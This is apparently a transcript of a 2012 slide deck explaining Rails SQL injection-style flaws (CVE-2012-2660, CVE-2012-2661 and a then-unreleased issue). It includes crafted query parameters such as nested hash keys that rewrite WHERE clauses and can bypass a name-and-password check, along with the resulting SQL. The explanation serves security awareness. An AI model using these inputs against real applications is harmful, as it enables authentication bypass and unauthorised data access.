"Recent Rails SQL Issues" - 2012

Transcript

1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

   and 3.x

3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

4. Query Parameters ?name[] {"name"=>[nil]}

5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

   keys Affects Rails 3.x

8. ActiveRecord Query User.where(:name => params[:name])

9. ActiveRecord Query User.where("users.name" => params[:name])

10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1